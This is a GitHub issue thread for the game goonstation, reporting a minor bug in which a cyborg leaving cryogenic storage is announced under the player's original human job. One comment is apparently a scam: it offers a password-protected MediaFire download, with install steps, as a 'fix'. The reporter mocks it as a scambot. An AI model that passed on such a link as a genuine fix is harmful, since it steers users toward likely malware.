### ISSUE TITLE
Exiting cryo as borg that was human has the roundstart job announced

### ISSUE THREAD

**Issue by JORJ949** [goonstation/goonstation#20523]
### Labels

[BUG] [MINOR]

### Description

Exiting Cryogenic storage as a borged cyborg has the player's roundstart job

### Steps to reproduce

1. Start as human and get borged
2. Enter Cryogenic storage as a cyborg
3. Exit Cryogenic storage

### Expected Behavior

"Borgo has signed up as Cyborg"

### Additional Information & Screenshots

![image](https://github.com/user-attachments/assets/80368ad9-f201-49b6-ae1d-935e96879bfd)
(Emma is a Staffie that got borged)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JORJ949** [comment]
> not a scambot123 said download my file to fix your issue

So true and real
